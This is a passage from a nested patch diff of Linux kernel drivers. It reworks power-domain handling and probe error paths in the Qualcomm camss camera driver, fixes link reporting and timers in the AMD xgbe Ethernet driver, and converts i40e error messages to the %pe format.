++	camss->genpd_link[id] = device_link_add(camss->dev, camss->genpd[id],
++						DL_FLAG_STATELESS |
++						DL_FLAG_PM_RUNTIME |
++						DL_FLAG_RPM_ACTIVE);
++	if (!camss->genpd_link[id])
++		return -EINVAL;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/media/platform/qcom/camss/camss.c b/drivers/media/platform/qcom/camss/camss.c
+index 5057b2c4cf6c4..a30461de3e844 100644
+--- a/drivers/media/platform/qcom/camss/camss.c
++++ b/drivers/media/platform/qcom/camss/camss.c
+@@ -1453,7 +1453,6 @@ static const struct media_device_ops camss_media_ops = {
+ static int camss_configure_pd(struct camss *camss)
+ {
+ 	struct device *dev = camss->dev;
+-	int last_pm_domain = 0;
+ 	int i;
+ 	int ret;
+ 
+@@ -1484,32 +1483,34 @@ static int camss_configure_pd(struct camss *camss)
+ 	if (!camss->genpd_link)
+ 		return -ENOMEM;
+ 
++	/*
++	 * VFE power domains are in the beginning of the list, and while all
++	 * power domains should be attached, only if TITAN_TOP power domain is
++	 * found in the list, it should be linked over here.
++	 */
+ 	for (i = 0; i < camss->genpd_num; i++) {
+ 		camss->genpd[i] = dev_pm_domain_attach_by_id(camss->dev, i);
+ 		if (IS_ERR(camss->genpd[i])) {
+ 			ret = PTR_ERR(camss->genpd[i]);
+ 			goto fail_pm;
+ 		}
++	}
+ 
+-		camss->genpd_link[i] = device_link_add(camss->dev, camss->genpd[i],
+-						       DL_FLAG_STATELESS | DL_FLAG_PM_RUNTIME |
+-						       DL_FLAG_RPM_ACTIVE);
+-		if (!camss->genpd_link[i]) {
+-			dev_pm_domain_detach(camss->genpd[i], true);
++	if (i > camss->vfe_num) {
++		camss->genpd_link[i - 1] = device_link_add(camss->dev, camss->genpd[i - 1],
++							   DL_FLAG_STATELESS | DL_FLAG_PM_RUNTIME |
++							   DL_FLAG_RPM_ACTIVE);
++		if (!camss->genpd_link[i - 1]) {
+ 			ret = -EINVAL;
+ 			goto fail_pm;
+ 		}
+-
+-		last_pm_domain = i;
+ 	}
+ 
+ 	return 0;
+ 
+ fail_pm:
+-	for (i = 0; i < last_pm_domain; i++) {
+-		device_link_del(camss->genpd_link[i]);
++	for (--i ; i >= 0; i--)
+ 		dev_pm_domain_detach(camss->genpd[i], true);
+-	}
+ 
+ 	return ret;
+ }
+@@ -1537,6 +1538,20 @@ static int camss_icc_get(struct camss *camss)
+ 	return 0;
+ }
+ 
++static void camss_genpd_cleanup(struct camss *camss)
++{
++	int i;
++
++	if (camss->genpd_num == 1)
++		return;
++
++	if (camss->genpd_num > camss->vfe_num)
++		device_link_del(camss->genpd_link[camss->genpd_num - 1]);
++
++	for (i = 0; i < camss->genpd_num; i++)
++		dev_pm_domain_detach(camss->genpd[i], true);
++}
++
+ /*
+  * camss_probe - Probe CAMSS platform device
+  * @pdev: Pointer to CAMSS platform device
+@@ -1612,31 +1627,23 @@ static int camss_probe(struct platform_device *pdev)
+ 	if (!camss->vfe)
+ 		return -ENOMEM;
+ 
+-	v4l2_async_nf_init(&camss->notifier);
+-
+-	num_subdevs = camss_of_parse_ports(camss);
+-	if (num_subdevs < 0) {
+-		ret = num_subdevs;
+-		goto err_cleanup;
+-	}
+-
+ 	ret = camss_icc_get(camss);
+ 	if (ret < 0)
+-		goto err_cleanup;
++		return ret;
+ 
+ 	ret = camss_configure_pd(camss);
+ 	if (ret < 0) {
+ 		dev_err(dev, "Failed to configure power domains: %d\n", ret);
+-		goto err_cleanup;
++		return ret;
+ 	}
+ 
+ 	ret = camss_init_subdevices(camss);
+ 	if (ret < 0)
+-		goto err_cleanup;
++		goto err_genpd_cleanup;
+ 
+ 	ret = dma_set_mask_and_coherent(dev, 0xffffffff);
+ 	if (ret)
+-		goto err_cleanup;
++		goto err_genpd_cleanup;
+ 
+ 	camss->media_dev.dev = camss->dev;
+ 	strscpy(camss->media_dev.model, "Qualcomm Camera Subsystem",
+@@ -1648,12 +1655,20 @@ static int camss_probe(struct platform_device *pdev)
+ 	ret = v4l2_device_register(camss->dev, &camss->v4l2_dev);
+ 	if (ret < 0) {
+ 		dev_err(dev, "Failed to register V4L2 device: %d\n", ret);
+-		goto err_cleanup;
++		goto err_genpd_cleanup;
++	}
++
++	v4l2_async_nf_init(&camss->notifier);
++
++	num_subdevs = camss_of_parse_ports(camss);
++	if (num_subdevs < 0) {
++		ret = num_subdevs;
++		goto err_v4l2_device_unregister;
+ 	}
+ 
+ 	ret = camss_register_entities(camss);
+ 	if (ret < 0)
+-		goto err_register_entities;
++		goto err_v4l2_device_unregister;
+ 
+ 	if (num_subdevs) {
+ 		camss->notifier.ops = &camss_subdev_notifier_ops;
+@@ -1688,31 +1703,22 @@ static int camss_probe(struct platform_device *pdev)
+ 
+ err_register_subdevs:
+ 	camss_unregister_entities(camss);
+-err_register_entities:
++err_v4l2_device_unregister:
+ 	v4l2_device_unregister(&camss->v4l2_dev);
+-err_cleanup:
+ 	v4l2_async_nf_cleanup(&camss->notifier);
++err_genpd_cleanup:
++	camss_genpd_cleanup(camss);
+ 
+ 	return ret;
+ }
+ 
+ void camss_delete(struct camss *camss)
+ {
+-	int i;
+-
+ 	v4l2_device_unregister(&camss->v4l2_dev);
+ 	media_device_unregister(&camss->media_dev);
+ 	media_device_cleanup(&camss->media_dev);
+ 
+ 	pm_runtime_disable(camss->dev);
+-
+-	if (camss->genpd_num == 1)
+-		return;
+-
+-	for (i = 0; i < camss->genpd_num; i++) {
+-		device_link_del(camss->genpd_link[i]);
+-		dev_pm_domain_detach(camss->genpd[i], true);
+-	}
+ }
+ 
+ /*
+@@ -1721,7 +1727,7 @@ void camss_delete(struct camss *camss)
+  *
+  * Always returns 0.
+  */
+-static int camss_remove(struct platform_device *pdev)
++static void camss_remove(struct platform_device *pdev)
+ {
+ 	struct camss *camss = platform_get_drvdata(pdev);
+ 
+@@ -1732,7 +1738,7 @@ static int camss_remove(struct platform_device *pdev)
+ 	if (atomic_read(&camss->ref_count) == 0)
+ 		camss_delete(camss);
+ 
+-	return 0;
++	camss_genpd_cleanup(camss);
+ }
+ 
+ static const struct of_device_id camss_dt_match[] = {
+@@ -1794,7 +1800,7 @@ static const struct dev_pm_ops camss_pm_ops = {
+ 
+ static struct platform_driver qcom_camss_driver = {
+ 	.probe = camss_probe,
+-	.remove = camss_remove,
++	.remove_new = camss_remove,
+ 	.driver = {
+ 		.name = "qcom-camss",
+ 		.of_match_table = camss_dt_match,
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-drv.c b/drivers/net/ethernet/amd/xgbe/xgbe-drv.c
+index 614c0278419bc..6b73648b37793 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-drv.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-drv.c
+@@ -682,10 +682,24 @@ static void xgbe_service(struct work_struct *work)
+ static void xgbe_service_timer(struct timer_list *t)
+ {
+ 	struct xgbe_prv_data *pdata = from_timer(pdata, t, service_timer);
++	struct xgbe_channel *channel;
++	unsigned int i;
+ 
+ 	queue_work(pdata->dev_workqueue, &pdata->service_work);
+ 
+ 	mod_timer(&pdata->service_timer, jiffies + HZ);
++
++	if (!pdata->tx_usecs)
++		return;
++
++	for (i = 0; i < pdata->channel_count; i++) {
++		channel = pdata->channel[i];
++		if (!channel->tx_ring || channel->tx_timer_active)
++			break;
++		channel->tx_timer_active = 1;
++		mod_timer(&channel->tx_timer,
++			  jiffies + usecs_to_jiffies(pdata->tx_usecs));
++	}
+ }
+ 
+ static void xgbe_init_timers(struct xgbe_prv_data *pdata)
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-ethtool.c b/drivers/net/ethernet/amd/xgbe/xgbe-ethtool.c
+index 6e83ff59172a3..32fab5e772462 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-ethtool.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-ethtool.c
+@@ -314,10 +314,15 @@ static int xgbe_get_link_ksettings(struct net_device *netdev,
+ 
+ 	cmd->base.phy_address = pdata->phy.address;
+ 
+-	cmd->base.autoneg = pdata->phy.autoneg;
+-	cmd->base.speed = pdata->phy.speed;
+-	cmd->base.duplex = pdata->phy.duplex;
++	if (netif_carrier_ok(netdev)) {
++		cmd->base.speed = pdata->phy.speed;
++		cmd->base.duplex = pdata->phy.duplex;
++	} else {
++		cmd->base.speed = SPEED_UNKNOWN;
++		cmd->base.duplex = DUPLEX_UNKNOWN;
++	}
+ 
++	cmd->base.autoneg = pdata->phy.autoneg;
+ 	cmd->base.port = PORT_NONE;
+ 
+ 	XGBE_LM_COPY(cmd, supported, lks, supported);
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c b/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
+index ca7372369b3e6..60be836b294bb 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
+@@ -1178,7 +1178,19 @@ static int xgbe_phy_config_fixed(struct xgbe_prv_data *pdata)
+ 	if (pdata->phy.duplex != DUPLEX_FULL)
+ 		return -EINVAL;
+ 
+-	xgbe_set_mode(pdata, mode);
++	/* Force the mode change for SFI in Fixed PHY config.
++	 * Fixed PHY configs needs PLL to be enabled while doing mode set.
++	 * When the SFP module isn't connected during boot, driver assumes
++	 * AN is ON and attempts autonegotiation. However, if the connected
++	 * SFP comes up in Fixed PHY config, the link will not come up as
++	 * PLL isn't enabled while the initial mode set command is issued.
++	 * So, force the mode change for SFI in Fixed PHY configuration to
++	 * fix link issues.
++	 */
++	if (mode == XGBE_MODE_SFI)
++		xgbe_change_mode(pdata, mode);
++	else
++		xgbe_set_mode(pdata, mode);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_client.c b/drivers/net/ethernet/intel/i40e/i40e_client.c
+index 8bcb98b85e3d9..a289f1bb3dbfc 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_client.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_client.c
+@@ -686,8 +686,8 @@ static int i40e_client_update_vsi_ctxt(struct i40e_info *ldev,
+ 	ctxt.flags = I40E_AQ_VSI_TYPE_PF;
+ 	if (err) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi config, err %d aq_err %s\n",
+-			 err,
++			 "couldn't get PF vsi config, err %pe aq_err %s\n",
++			 ERR_PTR(err),
+ 			 i40e_aq_str(&pf->hw,
+ 				     pf->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -714,8 +714,8 @@ static int i40e_client_update_vsi_ctxt(struct i40e_info *ldev,
+ 		err = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 		if (err) {
+ 			dev_info(&pf->pdev->dev,
+-				 "update VSI ctxt for PE failed, err %d aq_err %s\n",
+-				 err,
++				 "update VSI ctxt for PE failed, err %pe aq_err %s\n",
++				 ERR_PTR(err),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 		}
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c b/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
+index bba70bd5703bf..195421d863ab1 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
+@@ -135,8 +135,8 @@ static int i40e_dcbnl_ieee_setets(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB ETS configuration err %d aq_err %s\n",
+-			 ret,
++			 "Failed setting DCB ETS configuration err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -174,8 +174,8 @@ static int i40e_dcbnl_ieee_setpfc(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB PFC configuration err %d aq_err %s\n",
+-			 ret,
++			 "Failed setting DCB PFC configuration err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -225,8 +225,8 @@ static int i40e_dcbnl_ieee_setapp(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB configuration err %d aq_err %s\n",
+-			 ret,
++			 "Failed setting DCB configuration err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -290,8 +290,8 @@ static int i40e_dcbnl_ieee_delapp(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB configuration err %d aq_err %s\n",
+-			 ret,
++			 "Failed setting DCB configuration err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
+index e632041aed5f8..107bcca7db8c9 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
+@@ -1453,8 +1453,8 @@ static int i40e_set_link_ksettings(struct net_device *netdev,
+ 		status = i40e_aq_set_phy_config(hw, &config, NULL);
+ 		if (status) {
+ 			netdev_info(netdev,
+-				    "Set phy config failed, err %d aq_err %s\n",
+-				    status,
++				    "Set phy config failed, err %pe aq_err %s\n",
++				    ERR_PTR(status),
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			err = -EAGAIN;
+ 			goto done;
+@@ -1463,8 +1463,8 @@ static int i40e_set_link_ksettings(struct net_device *netdev,
+ 		status = i40e_update_link_info(hw);
+ 		if (status)
+ 			netdev_dbg(netdev,
+-				   "Updating link info failed with err %d aq_err %s\n",
+-				   status,
++				   "Updating link info failed with err %pe aq_err %s\n",
++				   ERR_PTR(status),
+ 				   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 
+ 	} else {
+@@ -1515,8 +1515,8 @@ static int i40e_set_fec_cfg(struct net_device *netdev, u8 fec_cfg)
+ 		status = i40e_aq_set_phy_config(hw, &config, NULL);
+ 		if (status) {
+ 			netdev_info(netdev,
+-				    "Set phy config failed, err %d aq_err %s\n",
+-				    status,
++				    "Set phy config failed, err %pe aq_err %s\n",
++				    ERR_PTR(status),
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			err = -EAGAIN;
+ 			goto done;
+@@ -1529,8 +1529,8 @@ static int i40e_set_fec_cfg(struct net_device *netdev, u8 fec_cfg)
+ 			 * (e.g. no physical connection etc.)
+ 			 */
+ 			netdev_dbg(netdev,
+-				   "Updating link info failed with err %d aq_err %s\n",
+-				   status,
++				   "Updating link info failed with err %pe aq_err %s\n",
++				   ERR_PTR(status),
+ 				   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 	}
+ 
+@@ -1636,8 +1636,8 @@ static int i40e_nway_reset(struct net_device *netdev)
+ 
+ 	ret = i40e_aq_set_link_restart_an(hw, link_up, NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "link restart failed, err %d aq_err %s\n",
+-			    ret,
++		netdev_info(netdev, "link restart failed, err %pe aq_err %s\n",
++			    ERR_PTR(ret),
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -1753,20 +1753,20 @@ static int i40e_set_pauseparam(struct net_device *netdev,
+ 	status = i40e_set_fc(hw, &aq_failures, link_up);
+ 
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_GET) {
+-		netdev_info(netdev, "Set fc failed on the get_phy_capabilities call with err %d aq_err %s\n",
+-			    status,
++		netdev_info(netdev, "Set fc failed on the get_phy_capabilities call with err %pe aq_err %s\n",
++			    ERR_PTR(status),
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_SET) {
+-		netdev_info(netdev, "Set fc failed on the set_phy_config call with err %d aq_err %s\n",
+-			    status,
++		netdev_info(netdev, "Set fc failed on the set_phy_config call with err %pe aq_err %s\n",
++			    ERR_PTR(status),
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_UPDATE) {
+-		netdev_info(netdev, "Set fc failed on the get_link_info call with err %d aq_err %s\n",
+-			    status,
++		netdev_info(netdev, "Set fc failed on the get_link_info call with err %pe aq_err %s\n",
++			    ERR_PTR(status),
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+@@ -5360,8 +5360,8 @@ flags_complete:
+ 						0, NULL);
+ 		if (ret && pf->hw.aq.asq_last_status != I40E_AQ_RC_ESRCH) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't set switch config bits, err %d aq_err %s\n",
+-				 ret,
++				 "couldn't set switch config bits, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			/* not a fatal problem, just keep going */
+@@ -5433,8 +5433,8 @@ flags_complete:
+ 					return -EBUSY;
+ 				default:
+ 					dev_warn(&pf->pdev->dev,
+-						 "Starting FW LLDP agent failed: error: %d, %s\n",
+-						 status,
++						 "Starting FW LLDP agent failed: error: %pe, %s\n",
++						 ERR_PTR(status),
+ 						 i40e_aq_str(&pf->hw,
+ 							     adq_err));
+ 					return -EINVAL;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 68ee2c59692d1..9f5824eb8808a 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -1822,8 +1822,8 @@ static int i40e_set_mac(struct net_device *netdev, void *p)
+ 		ret = i40e_aq_mac_address_write(hw, I40E_AQC_WRITE_TYPE_LAA_WOL,
+ 						addr->sa_data, NULL);
+ 		if (ret)
+-			netdev_info(netdev, "Ignoring error from firmware on LAA update, status %d, AQ ret %s\n",
+-				    ret,
++			netdev_info(netdev, "Ignoring error from firmware on LAA update, status %pe, AQ ret %s\n",
++				    ERR_PTR(ret),
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 	}
+ 
+@@ -1854,8 +1854,8 @@ static int i40e_config_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_set_rss_key(hw, vsi->id, seed_dw);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot set RSS key, err %d aq_err %s\n",
+-				 ret,
++				 "Cannot set RSS key, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			return ret;
+ 		}
+@@ -1866,8 +1866,8 @@ static int i40e_config_rss_aq(struct i40e_vsi *vsi, const u8 *seed,
+ 		ret = i40e_aq_set_rss_lut(hw, vsi->id, pf_lut, lut, lut_size);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Cannot set RSS lut, err %d aq_err %s\n",
+-				 ret,
++				 "Cannot set RSS lut, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			return ret;
+ 		}
+@@ -2358,8 +2358,8 @@ void i40e_aqc_del_filters(struct i40e_vsi *vsi, const char *vsi_name,
+ 	if (aq_ret && !(aq_status == I40E_AQ_RC_ENOENT)) {
+ 		*retval = -EIO;
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "ignoring delete macvlan error on %s, err %d, aq_err %s\n",
+-			 vsi_name, aq_ret,
++			 "ignoring delete macvlan error on %s, err %pe, aq_err %s\n",
++			 vsi_name, ERR_PTR(aq_ret),
+ 			 i40e_aq_str(hw, aq_status));
+ 	}
+ }
+@@ -2488,8 +2488,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 							   NULL);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Set default VSI failed, err %d, aq_err %s\n",
+-				 aq_ret,
++				 "Set default VSI failed, err %pe, aq_err %s\n",
++				 ERR_PTR(aq_ret),
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	} else {
+@@ -2500,8 +2500,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 						  true);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "set unicast promisc failed, err %d, aq_err %s\n",
+-				 aq_ret,
++				 "set unicast promisc failed, err %pe, aq_err %s\n",
++				 ERR_PTR(aq_ret),
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 		aq_ret = i40e_aq_set_vsi_multicast_promiscuous(
+@@ -2510,8 +2510,8 @@ static int i40e_set_promiscuous(struct i40e_pf *pf, bool promisc)
+ 						  promisc, NULL);
+ 		if (aq_ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "set multicast promisc failed, err %d, aq_err %s\n",
+-				 aq_ret,
++				 "set multicast promisc failed, err %pe, aq_err %s\n",
++				 ERR_PTR(aq_ret),
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	}
+@@ -2815,9 +2815,9 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 			retval = i40e_aq_rc_to_posix(aq_ret,
+ 						     hw->aq.asq_last_status);
+ 			dev_info(&pf->pdev->dev,
+-				 "set multi promisc failed on %s, err %d aq_err %s\n",
++				 "set multi promisc failed on %s, err %pe aq_err %s\n",
+ 				 vsi_name,
+-				 aq_ret,
++				 ERR_PTR(aq_ret),
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		} else {
+ 			dev_info(&pf->pdev->dev, "%s allmulti mode.\n",
+@@ -2835,10 +2835,10 @@ int i40e_sync_vsi_filters(struct i40e_vsi *vsi)
+ 			retval = i40e_aq_rc_to_posix(aq_ret,
+ 						     hw->aq.asq_last_status);
+ 			dev_info(&pf->pdev->dev,
+-				 "Setting promiscuous %s failed on %s, err %d aq_err %s\n",
++				 "Setting promiscuous %s failed on %s, err %pe aq_err %s\n",
+ 				 cur_promisc ? "on" : "off",
+ 				 vsi_name,
+-				 aq_ret,
++				 ERR_PTR(aq_ret),
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		}
+ 	}
+@@ -2986,8 +2986,8 @@ void i40e_vlan_stripping_enable(struct i40e_vsi *vsi)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "update vlan stripping failed, err %d aq_err %s\n",
+-			 ret,
++			 "update vlan stripping failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 	}
+@@ -3021,8 +3021,8 @@ void i40e_vlan_stripping_disable(struct i40e_vsi *vsi)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "update vlan stripping failed, err %d aq_err %s\n",
+-			 ret,
++			 "update vlan stripping failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 	}
+@@ -3266,8 +3266,8 @@ int i40e_vsi_add_pvid(struct i40e_vsi *vsi, u16 vid)
+ 	ret = i40e_aq_update_vsi_params(&vsi->back->hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&vsi->back->pdev->dev,
+-			 "add pvid failed, err %d aq_err %s\n",
+-			 ret,
++			 "add pvid failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&vsi->back->hw,
+ 				     vsi->back->hw.aq.asq_last_status));
+ 		return -ENOENT;
+@@ -5533,8 +5533,8 @@ static int i40e_vsi_get_bw_info(struct i40e_vsi *vsi)
+ 	ret = i40e_aq_query_vsi_bw_config(hw, vsi->seid, &bw_config, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi bw config, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't get PF vsi bw config, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -5544,8 +5544,8 @@ static int i40e_vsi_get_bw_info(struct i40e_vsi *vsi)
+ 					       NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "couldn't get PF vsi ets bw config, err %d aq_err %s\n",
+-			 ret,
++			 "couldn't get PF vsi ets bw config, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -5734,8 +5734,8 @@ int i40e_update_adq_vsi_queues(struct i40e_vsi *vsi, int vsi_offset)
+ 
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+-		dev_info(&pf->pdev->dev, "Update vsi config failed, err %d aq_err %s\n",
+-			 ret,
++		dev_info(&pf->pdev->dev, "Update vsi config failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return ret;
+ 	}
+@@ -5790,8 +5790,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 						  &bw_config, NULL);
+ 		if (ret) {
+ 			dev_info(&pf->pdev->dev,
+-				 "Failed querying vsi bw info, err %d aq_err %s\n",
+-				 ret,
++				 "Failed querying vsi bw info, err %pe aq_err %s\n",
++				 ERR_PTR(ret),
+ 				 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			goto out;
+ 		}
+@@ -5857,8 +5857,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 	ret = i40e_aq_update_vsi_params(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Update vsi tc config failed, err %d aq_err %s\n",
+-			 ret,
++			 "Update vsi tc config failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -5870,8 +5870,8 @@ static int i40e_vsi_config_tc(struct i40e_vsi *vsi, u8 enabled_tc)
+ 	ret = i40e_vsi_get_bw_info(vsi);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed updating vsi bw info, err %d aq_err %s\n",
+-			 ret,
++			 "Failed updating vsi bw info, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		goto out;
+ 	}
+@@ -5962,8 +5962,8 @@ int i40e_set_bw_limit(struct i40e_vsi *vsi, u16 seid, u64 max_tx_rate)
+ 					  I40E_MAX_BW_INACTIVE_ACCUM, NULL);
+ 	if (ret)
+ 		dev_err(&pf->pdev->dev,
+-			"Failed set tx rate (%llu Mbps) for vsi->seid %u, err %d aq_err %s\n",
+-			max_tx_rate, seid, ret,
++			"Failed set tx rate (%llu Mbps) for vsi->seid %u, err %pe aq_err %s\n",
++			max_tx_rate, seid, ERR_PTR(ret),
+ 			i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 	return ret;
+ }
+@@ -6038,8 +6038,8 @@ static void i40e_remove_queue_channels(struct i40e_vsi *vsi)
+ 			last_aq_status = pf->hw.aq.asq_last_status;
+ 			if (ret)
+ 				dev_info(&pf->pdev->dev,
+-					 "Failed to delete cloud filter, err %d aq_err %s\n",
+-					 ret,
++					 "Failed to delete cloud filter, err %pe aq_err %s\n",
++					 ERR_PTR(ret),
+ 					 i40e_aq_str(&pf->hw, last_aq_status));
+ 			kfree(cfilter);
+ 		}
+@@ -6173,8 +6173,8 @@ static int i40e_vsi_reconfig_rss(struct i40e_vsi *vsi, u16 rss_size)
+ 	ret = i40e_config_rss(vsi, seed, lut, vsi->rss_table_size);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Cannot set RSS lut, err %d aq_err %s\n",
+-			 ret,
++			 "Cannot set RSS lut, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		kfree(lut);
+ 		return ret;
+@@ -6272,8 +6272,8 @@ static int i40e_add_channel(struct i40e_pf *pf, u16 uplink_seid,
+ 	ret = i40e_aq_add_vsi(hw, &ctxt, NULL);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "add new vsi failed, err %d aq_err %s\n",
+-			 ret,
++			 "add new vsi failed, err %pe aq_err %s\n",
++			 ERR_PTR(ret),
+ 			 i40e_aq_str(&pf->hw,
